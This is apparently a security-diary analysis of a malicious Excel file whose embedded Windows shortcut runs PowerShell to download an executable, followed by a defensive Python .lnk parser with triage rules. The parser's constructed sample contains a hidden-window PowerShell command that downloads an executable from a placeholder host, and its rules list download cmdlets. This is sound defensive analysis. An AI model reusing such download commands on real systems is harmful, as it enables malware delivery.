Reader nik submitted a malicious document. It's an Excel spreadsheet containing a Windows shortcut. As Windows shortcuts can contain interesting metadata, like the MAC address of the computer that created the .lnk file, I took a closer look.

First we take a look with oledump:

The O next to stream A2 indicates the spreadsheet contains an embedded OLE2 object. We can get more info:

It's a Windows shortcut file (created by Windows user Tiny). We will extract it for further analysis:

And then we can use Woanware's lnkanalyser:

Unfortunately, the .lnk file does not contain interesting metadata. But we can see that it uses PowerShell to download an executable from Dropbox.

Didier Stevens
DidierStevens | 640 Posts | ISC Handler | Jul 15th 2017
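The two things the diary looks for in the extracted shortcut, the command line that launches PowerShell and the creator metadata that lnkanalyser would have shown, both live in fixed places of the MS-SHLLINK structure. The parser below is an added example and is not code from the diary, from oledump or from lnkanalyser: it reads the StringData fields (relative path, working directory, arguments) and the ExtraData TrackerDataBlock, whose version-1 file GUID embeds the creating machine's NetBIOS name and MAC address, and then applies a few triage rules to what it found. It handles the case this sample fell into, a shortcut with no tracker block, by reporting the metadata as absent. The shortcut it parses is constructed inline; the machine name DESKTOP-TINY, the MAC 00:11:22:33:44:55 and the example.invalid URL are made-up values, not indicators from the diary.

```python
"""Minimal Windows Shell Link (.lnk) triage parser following MS-SHLLINK (added example)."""
import struct
import uuid

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
# LinkFlags bits of the ShellLinkHeader
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
TRACKER_SIG = 0xA0000003  # ExtraData TrackerDataBlock signature
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_RELPATH),
                 ("working_dir", HAS_WORKDIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON))


def _read_string(data, off, is_unicode):
    """StringData item: 2-byte character count, then the characters, no terminator."""
    count, = struct.unpack_from("<H", data, off)
    off += 2
    if is_unicode:
        raw, off = data[off:off + 2 * count], off + 2 * count
        return raw.decode("utf-16-le"), off
    raw, off = data[off:off + count], off + count
    return raw.decode("latin-1"), off


def parse_lnk(data):
    """Return the StringData fields plus machine name and creator MAC when recoverable."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    flags, = struct.unpack_from("<I", data, 20)
    off = 76                                      # ShellLinkHeader is always 0x4C bytes
    if flags & HAS_IDLIST:                        # LinkTargetIDList: 2-byte size + items (not decoded here)
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:                      # LinkInfo: 4-byte size that includes itself
        off += struct.unpack_from("<I", data, off)[0]
    info = {name: None for name, _ in STRING_FIELDS}
    info.update(machine_id=None, mac_address=None)
    for name, flag in STRING_FIELDS:              # StringData items appear in this fixed order
        if flags & flag:
            info[name], off = _read_string(data, off, bool(flags & IS_UNICODE))
    while off + 8 <= len(data):                   # ExtraData blocks until the TerminalBlock (size < 4)
        size, sig = struct.unpack_from("<II", data, off)
        if size < 4:
            break
        if sig == TRACKER_SIG and size >= 96:
            info["machine_id"] = data[off + 16:off + 32].split(b"\x00", 1)[0].decode("latin-1")
            # Droid = volume GUID (16) + file GUID (16); a version-1 file GUID carries the creator's MAC
            file_droid = uuid.UUID(bytes_le=data[off + 48:off + 64])
            if file_droid.version == 1:
                node = file_droid.node
                info["mac_address"] = ":".join(f"{(node >> (8 * i)) & 0xFF:02x}" for i in reversed(range(6)))
        off += size
    return info


def suspicious_indicators(info):
    """Cheap triage rules a defender can run over every shortcut pulled out of a document."""
    hits = []
    target = (info["relative_path"] or "").lower()
    args = (info["arguments"] or "").lower()
    if target.endswith("powershell.exe") or "powershell" in args:
        hits.append("launches PowerShell")
    if "http://" in args or "https://" in args:
        hits.append("command line contains a URL")
    if any(k in args for k in ("downloadfile", "downloadstring", "invoke-webrequest")):
        hits.append("downloads remote content")
    if "-w hidden" in args or "windowstyle hidden" in args:
        hits.append("hides its window")
    return hits


def build_sample_lnk(arguments, machine_id, mac_node):
    """Constructed sample (not the diary's file): PowerShell target, Unicode strings, one TrackerDataBlock."""
    flags = HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | IS_UNICODE
    header = (struct.pack("<I", 0x4C) + LINK_CLSID + struct.pack("<II", flags, 0x20)
              + b"\x00" * 24                                        # Creation/Access/Write FILETIMEs
              + struct.pack("<IIIH", 0, 0, 1, 0) + b"\x00" * 10)    # FileSize, IconIndex, ShowCommand, HotKey, Reserved
    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")
    strings = (s("..\\..\\..\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe")
               + s("C:\\Windows\\System32") + s(arguments))
    volume_droid = uuid.UUID("a1b2c3d4-e5f6-4a7b-8c9d-0e1f2a3b4c5d").bytes_le            # made-up volume id
    file_droid = uuid.UUID(fields=(0x01234567, 0x89AB, 0x11EF, 0x80, 0x01, mac_node)).bytes_le  # v1 GUID with MAC
    droid = volume_droid + file_droid
    tracker = (struct.pack("<IIII", 96, TRACKER_SIG, 88, 0)
               + machine_id.encode("ascii").ljust(16, b"\x00") + droid + droid)     # Droid and DroidBirth
    return header + strings + tracker + struct.pack("<I", 0)                          # TerminalBlock


if __name__ == "__main__":
    sample = build_sample_lnk('-w hidden -c "Invoke-WebRequest https://example.invalid/update.exe'
                              ' -OutFile $env:TEMP\\update.exe"', "DESKTOP-TINY", 0x001122334455)
    parsed = parse_lnk(sample)
    for key, value in parsed.items():
        print(f"{key:14}: {value}")
    print("indicators:", suspicious_indicators(parsed))
```

The LinkTargetIDList is skipped rather than decoded: on real samples the target path is often only present there, so a production tool (lnkanalyser does this) walks the item IDs as well. Reporting `mac_address` as None when the tracker block is missing, or when the file GUID is not version 1, is the honest result and matches what the diary found for this sample.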